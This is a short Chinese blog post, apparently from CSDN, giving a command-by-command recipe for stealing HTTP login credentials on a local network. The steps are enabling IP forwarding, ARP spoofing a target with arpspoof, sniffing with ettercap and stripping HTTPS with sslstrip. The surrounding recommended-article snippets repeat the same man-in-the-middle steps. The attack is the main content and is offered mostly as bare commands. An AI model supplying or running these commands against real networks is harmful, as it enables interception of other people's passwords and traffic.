Kali Linux 实战(二):HTTP账户密码获取

最新推荐文章于 2024-04-28 22:53:30 发布
最新推荐文章于 2024-04-28 22:53:30 发布
阅读量3.9k 收藏 11
点赞数 3
文章标签: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41374940/article/details/80789861
版权

1、开启IP转发

    echo 1 > /proc/sys/net/ipv4/ip_forward

2、ARP欺骗

    arpspoof -i eth0 -t 172.16.9.xxx 172.16.8.xx

3、密码获取

    ettercap -Tq -i eth0

    -Tq  >> 启动文本模式 ,q安静模式

    -i 网卡

注:只能获取HTTP网站账户密码(

http://defcon.cn/

结果截图:


如果账户名是中文 可用URL解码器(http://www.convertstring.com/zh_CN/EncodeDecode/UrlDecode)解码


sslstrip -a -f -k(可转HTTPS为HTTP)

PZR001
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Kali Linux - 嗅探和欺骗及密码破解工具
简介
02-05 2615
这期内容及其的少,所以…明天我休息( ̄︶ ̄*))下期更维护访问和逆向工程。
KaliLinux 进攻工具大合集(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
04-12 1363
Recon-ng是一个基于Web的侦察框架,使用Python编写。首先,你需要安装Recon-ng,可以通过克隆其GitHub仓库或使用包管理器安装。启动Recon-ng后,通过workspaces create [工作区名称]创建一个新的工作区,以隔离不同的侦察项目。使用marketplace search搜索可用的模块。找到需要的模块后,使用marketplace install [模块路径]安装模块。加载模块后,使用options set [选项] [值]配置模块所需的选项,如目标域名等。
关于Kali获取HTTP账号密码的学习笔记
Mi1k7ea
03-14 6487
HTTP协议是进行明文传输的,即在传输过程中不对数据进行加密。在局域网环境中,通过ARP欺骗,将目标主机的网络包都流经攻击者,然后再通过嗅探的方式从而获取HTTP的一些数据信息。下面主要是利用ettercap来进行嗅探,目标主机还是选择Ubuntu。 先是在Kali中开启转发流量: echo 1 > /proc/sys/net/ipv4/ip_forward 进行A
【2024最新版】超详细Kali安装保姆级教程,Kali Linux环境配置和使用指南,看完这一篇就够了
最新发布
2301_79058150的博客
04-28 1380
时,如果分区方案没有其他问题,应该选择“是”GRUB是用来从硬盘中启动一个操作系统的程序,根据提示选择默认的“是”即可。9)确认分区方案,选择“将所有文件放在同一个分区中(推荐新手使用)”10)继续确认分区更改,选择“结束分区设定并将修改写入磁盘”4)再根据提示设置一个域名,比如“abcd.cn”,继续。2)选择语言、接下来的步骤依次选择“中国”->“汉语”-将空白、休眠、关闭都设为“从不”然后“关闭”即可。提示设置主机名时,可以接受默认的“kali”在“软件选择”的环节,直接接受默认选择即可。
嗅探HTTP网页用户账户密码
weixin_45511599的博客
10-13 3210
嗅探HTTP网页 一:测试基础 1.ARP基础:使用mac地址和ip地址进行通信的局域网协议 2.HTTP:一种上网、网页请求通信协议。该协议以明文传输,即在传输时不对数据进行加密,因为http的不安全性,所以在局域网环境中,可以通过ARP欺骗,将目标主机的网络数据包都流经攻击者,然后再通过嗅探的方式从而获取HTTP的一些数据信息 3.Ettercap:一个kali自带的中间人套件 .实战测试 1.路由转发,确保目标主机正常上网(截获到的流量发送出去) echo 1 > /proc/sys/ne
Kali获取HTTP/HTTPS账号密码获取实验
春日野穹
08-24 8637
对arp欺骗一脸懵的可以参考我以前写的帖子 传送门 **这里介绍一下http/https协议: http: 1. 无状态:协议对客户端没有状态存储,对事物处理没有“记忆”能力,比如访问一个网站需要反复进行登录操作 2. 无连接:HTTP/1.1之前,由于无状态特点,每次请求需要通过TCP三次握手四次挥手,和服务器重新建立连接。比如某个客户机在短时间 ...
kali获取局域网内的http账号密码
silence-cc的博客
08-28 2760
环境: 虚拟机安装有kali作为攻击机, 靶机为自己的物理机win10。 网关为192.168.2.1, 测试网站为批处理之家 kali要安装disniff,原因时没法使用arpspoof,而使用arpspoof则要安装disniff。 目的:验证是否能通过arp攻击来获取局域网内的http网站的账号密码。 参考文章:B站的 kali使用ettercap抓取账号密码使用教程 步骤如下: 使用的相关命令如下: nmap -sP 192.168.2.1-255 扫
Kali 实现爆破获取用户名密码
热门推荐
tryheart的博客
08-26 1万+
preferen–setting 然后在浏览器里面输入搭建好的服务器地址 右键 看长度
基于Kali Linux的渗透测试方法探析.pdf
09-06
1. **《Kali Linux渗透测试实战》**:本书提供了大量的实战案例,详细介绍了如何使用Kali Linux进行各种类型的渗透测试,适合有一定基础的读者。 2. **《The Web Application Hacker’s Handbook》**:虽然主要...
Linux提权思路+实战 _ Mugen1
08-03
Linux有众多发行版,如CentOS、Red Hat、Ubuntu和Kali Linux等,它们基于Linux内核并包含不同的软件包和服务。Linux内核版本分为稳定版和开发版,版本号由三部分组成,其中奇数次位表示开发中版本,偶数次位表示稳定...
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
模拟Kali Linux已进入内网的情况,通过MS17-010漏洞获取Win7控制权。 4. **渗透测试工具**:熟悉Linux环境下的cpdmp工具,用于数据复制和移动。了解防火墙配置命令,以便调整安全策略。 5. **渗透测试流程**:使用...
URL编码解码工具 反向分析URL地址
11-30
URL编码解码工具,可以方便分析URL地址
工控安全职业证书技能实践:文件及程序安全权限配置实战.pptx
07-12
实验环境是靶机WinXP SP3和Kali Linux。 在工控安全中,用户身份和进程权限的管理至关重要。用户是操作系统中获取资源的凭证,而权限则决定了用户对资源的访问控制。进程作为程序执行的实例,它的权限由发起进程的...
kali http/https窃取用户名和密码
qq_39345447的博客
10-16 1935
知识点: Arpspoof ——》欺骗 Ettercap ——欺骗,Dns欺骗 流量嗅探 环境: 目标机器192.168.1.100 网关:192.168.1.1 流程: 1.echo 1 > /proc/sys/net/ipv4/ip_forward 流量通过自己网卡转发 cat /proc/sys/net/ipv4/ip_forward 如果显示‘1’,则执行成功 2.arpspoof...
利用Kali Linux获取http协议加密的账户密码
湖北杰哥的博客
11-22 7125
利用Kali Linux获取http协议加密的账户密码
学习笔记:kaili linux获取同网段的账号和密码
weixin_44803302的博客
06-23 376
环境:攻击者:kali2020 靶机:windowxp kaili的ip Windowxp的IP 测试能不能ping通 路由的转发,确保目标主机正常上网 欺骗目标,我就是网关,开始arp欺骗 再另一个端口嗅探登录密码 打开windowXP上网打开一个http的网站(这里用的是4399) 点击登录输入密码(错误的密码也可以)主要是做实验嗅到密码为主 打开kali查看已经嗅到密码 最后一步上www.cmd5.com 上解密即可 最后,此文只是向大家展示一下kaili渗透的相关过程,任何人不得用
Linuxkali破解密码
baidu_41906841的博客
01-27 5890
一、环境描述 Linux version 5.14.0-kali4-686-pae (devel@kali.org) (gcc-10 (Debian 10.3.0-12) 10.3.0, GNU ld (GNU Binutils for Debian) 2.37) #1 SMP Debian 5.14.16-1kali1 (2021-11-05) 、操作步骤 (1)开进grub界面按e; (2)在如下界面,将ro改为rw,在行末加入init=/bin/bash (3)修改完成后,执行Ctrl
kali菜单中各工具功能
weixin_34138056的博客
04-08 3743
一、说明 各工具kali官方简介(竖排):https://tools.kali.org/tools-listing 安装kali虚拟机可参考:https://www.cnblogs.com/lsdb/p/6500757.html pentestbox:虚拟机还是比较耗内存的,内存不够可以试试pentestbox,从功能上可以理解为运行在windows上的kali发行版,kali主流工具它都具备。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

PZR001

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值